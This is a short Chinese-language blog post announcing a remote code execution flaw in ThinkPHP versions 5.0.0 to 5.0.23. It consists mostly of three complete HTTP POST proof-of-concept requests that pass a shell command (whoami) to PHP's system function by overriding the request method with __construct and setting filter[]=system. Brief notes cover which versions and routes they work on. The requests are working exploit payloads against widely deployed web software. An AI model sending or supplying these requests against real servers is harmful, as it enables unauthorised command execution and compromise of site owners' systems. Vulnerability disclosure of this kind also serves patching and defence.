今天thinkphp官方又双叒叕发布了5.0.24版本,包含了一个可能getshell的安全更新。在12月9日thinkphp爆出远程代码执行之后,今天晚上又爆出来远程代码执行,见官方公告。
影响范围
thinkphp5.0.0~5.0.23
各版本PoC
thinkphp5.0.10版本poc如图
POST /think-5.0.10/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 53 s=whoami&_method=__construct&method=&filter[]=system
在官网最新下载的5.0.23完整版中,在App类(thinkphp/library/think/App.php)中module方法增加了设置filter参数值的代码,用于初始化filter。因此通过上述请求设置的filter参数值会被重新覆盖为空导致无法利用。
thinkphp5.0.23版本需要开启debug模式才可以利用,附两个poc:
POST /thinkphp/public/index.php HTTP/1.1 Host: 127.0.0.1 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 65 _method=__construct&filter[]=system&server[REQUEST_METHOD]=whoami
POST /thinkphp/public/index.php?s=captcha HTTP/1.1 Host: 127.0.0.1 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 77 _method=__construct&filter[]=system&method=post&server[REQUEST_METHOD]=whoami
上一个rec参考链接
https://y4er.com/post/thinkphp5.x-rce-18-12-9/
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er